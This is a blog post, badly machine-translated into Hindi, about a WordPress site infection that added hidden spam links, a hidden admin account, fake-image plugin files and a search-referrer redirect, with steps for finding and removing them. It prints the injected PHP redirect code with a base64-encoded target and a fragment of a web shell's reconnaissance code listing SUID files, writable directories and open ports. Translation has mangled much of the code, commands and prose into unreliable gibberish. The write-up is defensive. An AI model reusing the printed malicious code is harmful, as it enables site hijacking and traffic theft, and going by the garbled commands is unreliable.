इस blogosphere तुम था कि बग ... लेकिन मेरे लिए पकड़ा?

पिछले महीने में, मैं चेतावनी प्राप्त हो गया है ब्लॉग में वायरस कुछ आगंतुकों में. मैं एक बहुत अच्छा एंटीवायरस स्थापित क्योंकि शुरू में मैं, चेतावनियों पर ध्यान नहीं दिया (Kaspersky ए.वी. 2009) और हालांकि मैं ब्लॉग पर बहुत समय बिता रहा था, मुझे वायरस अलर्ट कभी नहीं मिला (... मैंने पहले कुछ संदिग्ध देखा है, जो पहले ताज़ा हो गया था।
धीरे धीरे बड़े बदलाव दिखाई देने लगे आगंतुक यातायातजो यातायात में हाल ही में तेजी से गिर गया है और मुझे बताओ, जो अधिक से अधिक लोगों को होना शुरू हुआ है, के बाद कि stealthsettings.com यह है virused. एंटीवायरस एक अवरुद्ध कल जब मैं एक स्क्रीनशॉट किया किसी से प्राप्त लिपि stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. यह मैं खोज सभी स्रोतों डाला कि, मेरे लिए बहुत समझाने गया था. मेरे दिमाग में आया कि पहले विचार करना था उन्नयन के नवीनतम संस्करण वर्डप्रेस (2.5.1), लेकिन सभी पुराने वर्डप्रेस स्क्रिप्ट फ़ाइलों को हटाने और करने से पहले नहीं बैकअप डेटाबेस. यह प्रक्रिया असफल रहा है और शायद मैं कहा होता तो जहां यह फोड़ा, सेमा लगाने के लिए एक लंबा समय ले लिया जाएगा कॉफी पर एक चर्चा में उन्होंने पाया गूगल और यह उसे देखने के लिए अच्छा होगा।
प्रकाशित MyDigitalLife.info, एक लेख हकदार: "हैक: स्वस्थ और गूगल और खोज इंजन या, आपका Needs.info AnyResults.Net, स्वर्ण Info.net और अन्य अवैध साइटें पर पुनः निर्देशित नहीं कुकी आवागमन फिक्स"यही तो मैं जरूरत धागे का अंत है.
यह एक के बारे में है शोषण करना वर्डप्रेस कुकी पर आधारित, जो मुझे बहुत जटिल है और लगता है कि किताब बनाया. एक बनाने के लिए काफी चालाक SQL इंजेक्शन ब्लॉग का डाटाबेस, एक अदृश्य उपयोगकर्ता बनाने के लिए एक साधारण नियमित जाँच डैशबोर्ड->उपयोगकर्ता, "लिखने" सर्वर निर्देशिका और फाइल की जांच (Chmod 777 के साथ) की तलाश है, और करने के लिए निष्पादित जड़ उपयोगकर्ता या समूह के विशेषाधिकारों के साथ फाइल. मैं कई ब्लॉग्स रोमानिया सहित, संक्रमित हैं कि इस तथ्य के बावजूद नाम का फायदा उठाने और उसके बारे में लिखा कुछ लेख देखते हैं कि वहाँ जो पता नहीं है. ठीक है ... मैं वायरस के बारे में सामान्योक्तियां समझाने की कोशिश करने की कोशिश करेंगे.

वायरस क्या है?

सबसे पहले, ब्लॉग पर पृष्ठों के स्रोतों डालें, दर्शकों के लिए अदृश्य लेकिन दिखाई और खोज इंजन, विशेष रूप से गूगल के लिए सूचकांकीय जोड़ता है। इस तरह हमलावर ने संकेत दिया साइटों के लिए पेज रैंक का स्थानांतरण. दूसरा, डाला जाता है पुनर्निर्देशन कोड Google, Live, याहू, ... या आरएसएस रीडर से आने वाले आगंतुकों के लिए यूआरएल और इसमें साइट नहीं है कुकी. एक एंटीवायरस के रूप में पुनर्निर्देशित पता लगाता है ट्रोजन Clicker.HTML.

लक्षण:

आगंतुक यातायात में भारी गिरावट, विशेष रूप से सबसे अधिक आगंतुकों गूगल से आते हैं जहां ब्लॉग पर.

पहचान: (यहां उन लोगों के लिए समस्या है जो नहीं जानते कि phpmyadmin, php और linux कैसे)

ला। सावधान! सबसे पहले एक बैकअप डेटाबेस बनाने के लिए!

1. स्रोत फ़ाइलों की जाँच करें index.php, header.php, footer.php, ब्लॉग के विषय और एन्क्रिप्शन का उपयोग करता है कि एक कोड है देखने base64 या होता है "अगर ($ सेवा ==" 1 && sizeof ($ _COOKIE) == 0?) "फार्म:

<Php?
$ सेरेफ़ = सरणी ("गूगल", "एमएसएन", "जी", "अल्टा विस्टा"
"पूछो", "याहू", "एओएल", "सीएनएन", "मौसम", "एलेक्स");
$ सर्विसेज = 0; foreach ($ $ के रूप में सेरेफ़ रेफरी)
अगर (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ रेफरी) == false) {$ सेवाओं = "1;? तोड़;}!
अगर (सेवा $ == "1 && sizeof ($ _COOKIE) == 0?) {हैडर (" स्थान: ". base64_decode (" '.)' http:// YW55cmVzdWx0cy5uZXQ = / ') बाहर निकलें;
}>

... या कुछ और. इस कोड को नष्ट!

छवि पर क्लिक करें ...

सूचकांक कोड

ऊपर के स्क्रीनशॉट में मैं गलती और द्वारा चयनित "<? Php get_header ();?>". उस कोड रहना चाहिए.

2. उपयोग phpMyAdmin और डेटाबेस की मेज पर जाने wp_usersपर बनाया कोई उपयोगकर्ता नाम नहीं है तो कहां की जांच 00:00:00 0000-00-00 (संभावित प्लेसमेंट user_login "वर्डप्रेस" लिखें. इस उपयोगकर्ता आईडी (फ़ील्ड आईडी) लिखें और फिर इसे हटा दें.

छवि पर क्लिक करें ...

नकली उपयोगकर्ता

* ग्रीन लाइन को हटा दिया और उसकी पहचान को बनाए रखा जाना चाहिए. की दशा में था आईडी = 8 .

3. टेबल पर जाएं wp_usermeta, कहाँ जाना है स्थित और पोंछ आईडी के लिए लाइनें (जहां क्षेत्र user_id ID मान) को नष्ट कर दिया प्रकट होता है.

4. तालिका में wp_option, करने के लिए जाओ active_plugins और संदिग्ध सक्षम है क्या प्लगइन देखें. यह अंत की तरह इस्तेमाल किया जा सकता है _old.giff, _old.pngg, _old.jpeg, _new.php.giff_old और नया फर्जी छवि के साथ आदि एक्सटेंशन संयोजन.

कहां option_name = 'active_plugins' wp_options चयन करें * से

इस प्लगइन हटाएँ, तो ब्लॉग पर जाने -> डैशबोर्ड -> प्लगइन्स, निष्क्रिय और एक निश्चित प्लगइन सक्रिय है.

यह active_plugins वायरस फ़ाइल प्रतीत होता है देखने के लिए छवि पर क्लिक करें.

लगाना

FTP_ SSug पर पथ का पालन करें, active_plugins में इंगित करें और सर्वर पर फ़ाइल को हटाएं।

5। तालिका में phpMyAdmin में भी wp_option, युक्त पंक्ति ढूँढें और हटाएँ "rss_f541b3abd05e7962fcab37737f40fad8"और के बीच"internal_links_cache ".
Internal_links_cache में अपने ब्लॉग को और एक में दिखाई देते हैं एन्क्रिप्टेड स्पैम लिंक बना रहे हैं गूगल ऐडसेंस कोड, हैकर.

6. सिफारिश करने के लिए है पासवर्ड बदलना ब्लॉग और प्रवेश सभी संदिग्ध userele हटाने. वर्डप्रेस के नवीनतम संस्करण के लिए और नए उपयोगकर्ताओं के पंजीकरण की अनुमति नहीं करने के लिए ब्लॉग सेट अपग्रेड. कोई नुकसान नहीं है ... टिप्पणी और विसंगत नहीं कर सकते हैं.

मैं इस वायरस ब्लॉग साफ करने के लिए ऐसी स्थिति में क्या करना है, कुछ हद तक ऊपर समझाने की कोशिश की. समस्या यह है कि उपयोग किया जाता है, ऐसा लगता है की तुलना में अधिक गंभीर है और शायद ही हल है सुरक्षा कमजोरियों ब्लॉग है जो वेब सर्वर होस्टिंग,.

उपयोग के साथ सुरक्षा के लिए पहली बार एक उपाय के रूप में, एसएसएचदेखने के लिए सर्वर पर कुछ चेक करें कि अगर किसी अंत के साथ * _old * और * नया. * तरह फ़ाइलों.Giff,. JPEG,. pngg,. jpgg. इन फ़ाइलों को नष्ट कर दिया जाना चाहिए. आप उदाहरण के लिए, एक फ़ाइल का नाम बदलते हैं. top_right_old.giff in top_right_old.phpहम फ़ाइल बिल्कुल शोषण कोड सर्वर है कि देखते हैं.

सर्वर की जांच, सफाई और सुरक्षा के लिए कुछ उपयोगी टिप्स। (एसएसएच के माध्यम से)

1। सीडी / tmp जैसे फ़ोल्डरों अगर वहाँ और जाँच tmpVFlma या अन्य संयोजन और इसे मिटा ही नाम है. नीचे स्क्रीनशॉट, मुझ से दो ऐसे फ़ोल्डरों देखें:

tmpserver

rm-आरएफ foldername

2. संभावित फ़ोल्डरों विशेषताओं के रूप में elimiati (chmod परिवर्तन) की जाँच करें chmod 777

वर्तमान dir में सभी लिखने योग्य फ़ाइलों को खोजने के लिए: खोजें. प्रकार च पर्म-2-रास
वर्तमान dir में सभी लिखने योग्य निर्देशिका मिल: खोजें. प्रकार घ पर्म-2-रास
वर्तमान dir में सभी लिखने योग्य निर्देशिकाओं और फ़ाइलों को खोजने के लिए: खोजें. -पेर्म-2-रास

3. सर्वर पर संदिग्ध फ़ाइलों के लिए खोज रहे हैं.

खोजें. -नाम "* _new.php *"
खोजें. -नाम "* _old.php *"
खोजें. -नाम "*. Jpgg"
खोजें. -नाम "* _giff"
खोजें. -नाम "* _pngg"

4, सावधान! बिट सेट गई फ़ाइलें SUID si SGID. इन फ़ाइलों को उपयोगकर्ता (समूह) या रूट, नहीं फ़ाइल निष्पादित जो उपयोगकर्ता के विशेषाधिकारों के साथ निष्पादित. सुरक्षा मुद्दों अगर ये फाइलें, जड़ समझौता हो सकता है. आप SUID और SGID बिट्स के साथ फाइल का उपयोग करते हैं, 'प्रदर्शनchmod 0 " या उन पर युक्त पैकेज की स्थापना रद्द करें.

कहीं स्रोत में शामिल शोषण ...:

{(! $ safe_mode) अगर
अगर ($ os_type == 'इंकार') {
$ ओएस = ('sysctl-n kern.ostype') निष्पादित करें.
$ ओएस = ('sysctl-n kern.osrelease') निष्पादित करें.
$ ओएस = ('sysctl-n kernel.ostype') निष्पादित करें.
$ ओएस = ('sysctl-n kernel.osrelease') निष्पादित करें.
(खाली ($ उपयोगकर्ता)) $ उपयोगकर्ता = ('आईडी') निष्पादित अगर;
$ नामः = सरणी (
"=>",
'पता लगाएं SUID फाइलें' => 'पा / प्रकार च पर्म-04000-रास',
=> 'पा / प्रकार च पर्म-02000-रास' sgid फ़ाइलों का पता लगाएं '
=> 'पा' वर्तमान dir में सभी लिखने योग्य फाइल का पता लगाएं. प्रकार च पर्म-2-रास ',
=> 'पा' वर्तमान dir में सभी लिखने योग्य निर्देशिकाओं का पता लगाएं '. प्रकार घ पर्म-2-रास ',
=> 'पा' वर्तमान dir में सभी लिखने योग्य निर्देशिका और फाइल का पता लगाएं. -पेर्म-2-रास ',
'दिखाएँ खोला बंदरगाहों' => 'netstat-एक | grep-i सुनो',
);
और} {
. $ Os_name = ('देखें') निष्पादित;
$ प्रयोक्ता = ('गूंज% उपयोगकर्ता नाम%') निष्पादित करें.
$ नामः = सरणी (
"=>",
"सेवाओं runing शो '=>' नेट प्रारंभ '
'शो प्रक्रिया सूची' => 'कार्यसूची'
);
}

इस तरह ... मूल रूप से सुरक्षा में उल्लंघनों पाता. बंदरगाहों निर्देशिका "लिखने" और समूह निष्पादन विशेषाधिकार फ़ाइलें / रूट खुला.

वापस अधिक के साथ ...

संक्रमित कुछ ब्लॉगों: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / ब्लॉग,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / ब्लॉग /,

www.mirabilismedia.ro / ब्लॉग, Blog.einvest.ro
... सूची पर चला जाता है ... एक बहुत.

एक ब्लॉग वायरस है अगर आप गूगल सर्च इंजन का उपयोग करते हुए देख सकते हैं. कॉपी और पेस्ट:

साइट www.blegoo.com खरीद

शुभ रात्रि और ;) काम करने के लिए वृद्धि जल्द ही मैं पर अद्यतन यूजेन के साथ आ जाएगा prevezibil.imprevizibil.com.

BRB :)

करने के लिए: सावधान! WordPress विषय या वर्डप्रेस 2.5.1 के लिए नवीनीकरण नहीं, इस वायरस से छुटकारा पाने के लिए एक समाधान बदल रहा है.

इस blogosphere तुम था कि बग ... लेकिन मेरे लिए पकड़ा?

लेखक के बारे में

छल

सब कुछ है कि गैजेट और आईटी 2006 की ख़ुशी से stealthsettings.com लिख सकते हैं और मैं कंप्यूटर और MacOS, लिनक्स, विंडोज, iOS और Android के बारे में आप के साथ नई चीजों की खोज करना चाहते के बारे में भावुक।

एक टिप्पणी छोड़ दो

यह साइट स्पैम को कम करने के लिए अकिस्मेट का उपयोग करती है। जानें कि आपका डेटा कैसे संसाधित किया जाता है.